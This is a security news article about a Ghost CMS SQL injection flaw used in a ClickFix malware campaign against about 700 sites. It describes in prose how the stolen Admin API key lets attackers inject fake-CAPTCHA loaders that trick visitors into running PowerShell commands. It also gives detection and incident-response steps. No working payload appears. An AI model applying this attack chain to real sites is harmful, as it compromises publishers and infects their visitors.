CRITICAL: Ghost CMS SQL Injection Bug Turns Harvard, Oxford and 700 Other Sites Into ClickFix Launchpads

There is a special kind of irony when the platform built to publish words gets turned into a delivery system for malware. That is exactly the position roughly 700 organizations running Ghost CMS find themselves in this week, and the list of casualties reads like an honor roll of institutions that should know better. Harvard University. Oxford University. Auburn University. DuckDuckGo. Universities, AI startups, security research firms, fintech companies, blockchain shops, and major media outlets all got pulled into a sprawling ClickFix campaign over the past two and a half weeks, and the entry point was a single SQL injection bug that has been sitting in the wild since February.

The vulnerability is CVE-2026-26980, a SQL injection flaw in the Ghost Content API that GitHub's own CNA scored at 9.4 critical while NIST settled on a more conservative 7.5 high. The disagreement comes down to whether you weight integrity and availability impact alongside data theft. The attackers running the current campaign settled the debate by demonstrating that the integrity impact is, in fact, catastrophic.

Here is how the attack chain works. An unauthenticated attacker hits the Content API with a crafted request that abuses the SQL injection to pull arbitrary data from the underlying database. What they want is the Admin API key, which Ghost stores in plain reach of the Content API surface. Once they have that key, they pivot to the Admin API and start editing published posts. The vulnerability itself only grants read access, but the credential it leaks is the master key to the entire content management system. From a CVSS scoring perspective this is a beautiful example of why a confidentiality only label can dangerously understate the real blast radius.

The malicious payload they inject is a two stage JavaScript loader. Visitors browsing an infected article see a fake CAPTCHA prompt that walks them through what looks like a routine verify you are human workflow. The instructions tell the visitor to press Windows Key plus R, paste a Base64 encoded command into the Run dialog, and hit Enter. The command decodes to a PowerShell or curl payload that pulls down a Windows executable and runs it with the user's privileges. This is the ClickFix pattern that has dominated commodity malware delivery for the past year, now riding on top of trusted university and media domains so the social engineering looks authoritative.

Two separate threat actor groups appear to be running parallel campaigns against the same vulnerability, and researchers at QiAnXin's XLab observed cases where the same compromised site was poisoned, repoisoned, and poisoned again within a twenty four hour window as the two crews fought over real estate. That kind of competitive infestation is a strong signal that the underlying flaw is trivial to exploit at scale and that mass scanning has been running continuously against the Ghost user base.

Ghost, the company behind the open source CMS, shipped the fix in version 6.19.1 back in February of this year. The patch addresses the SQL injection cleanly, but it does nothing to remediate sites that were already compromised. If an attacker pulled your Admin API key before you patched, rotating to the new release does not lock them out. They still have the key. They can still log in. They can still edit your posts. Any site that ran a vulnerable version between February and the patch deployment date needs to assume the API key is burned and rotate it manually. The same goes for administrative passwords and session tokens, both of which can be derived or harvested through the same database read primitive depending on configuration.

Affected versions span Ghost 3.24.0 through 6.19.0, which covers nearly six years of releases. That is a long tail of self hosted installations sitting on older versions because nobody wanted to deal with breaking changes in the Admin API or because the marketing team forgot the CMS exists between launches. The Ghost Pro hosted service was patched by the vendor automatically, so customers on that plan are largely fine assuming they are still on a supported tier. The self hosted population is where the carnage lives, and it is the population most likely to ignore security advisories from a CMS vendor.

Detection on this one is not subtle if you know where to look. Any Ghost site should be audited for unexpected JavaScript injected into post bodies, particularly script tags that reference external domains the editorial team did not approve. The XLab writeup includes a handful of indicators of compromise covering the loader domains and the staging infrastructure, and Bleeping Computer's coverage cross references the same set. Looking at web server access logs for unusual Content API queries with SQL like patterns in URL parameters will flag the initial exploitation attempts, and the Admin API access logs should be reviewed for sessions originating from IP addresses that have never authenticated before. If your CMS sits behind a CDN, the CDN logs are the best source of truth because attackers will sometimes manage to clear local access logs after compromise but rarely have the access to scrub upstream telemetry.

For incident response, the playbook looks like this in prose form. Upgrade to 6.19.1 or later immediately. Rotate every Admin API key. Force a password reset for all administrative users. Invalidate all active sessions. Pull a diff of every published post against your last known good backup and look for injected scripts or modified content. Notify your visitors that the site was compromised and recommend they run an antivirus scan if they followed any unusual instructions in the past two weeks. Preserve forensic copies of access logs before they rotate out of retention, because if you are a regulated entity you may need them later. None of this is glamorous, and all of it is necessary.

The ClickFix pattern itself deserves a moment of attention because it is going to keep finding new delivery vehicles. The technique works because it weaponizes the user's trust in the site they are visiting against the platform they are running it on. When someone sees a CAPTCHA on Harvard's news page they do not pause to ask whether universities normally serve CAPTCHAs that require them to paste commands into the Run dialog. They follow the instructions because the instructions are coming from a domain they trust. Browser based defenses cannot fully solve this because the malicious payload never executes in the browser. The browser is just the social engineering surface. The execution happens in a shell the user opened themselves. Endpoint protection that blocks unusual PowerShell or curl invocations from explorer.exe is one of the few controls that actually catches this reliably, which makes EDR coverage on Windows fleets a hard requirement rather than a nice to have.

For MSPs the angle here writes itself. Any client running a self hosted CMS, whether Ghost or WordPress or Drupal, needs a managed patching cadence and a documented credential rotation procedure. Selling a CMS security review as a fixed price engagement gets you in the door and gives you ammunition for an ongoing managed service contract. The conversation with prospects is straightforward when you can say that 700 organizations including some of the most prestigious institutions in the English speaking world just got owned through a vulnerability that has had a patch available for three months. Pair that with an EDR upsell focused on ClickFix detection rules and you have a complete narrative that maps a real news story to a real security gap you can close for them this quarter.

Patch Ghost, rotate keys, audit your posts, and treat any self hosted CMS in your environment as a high value target until proven otherwise. Drop everything and patch this now applies in full force here.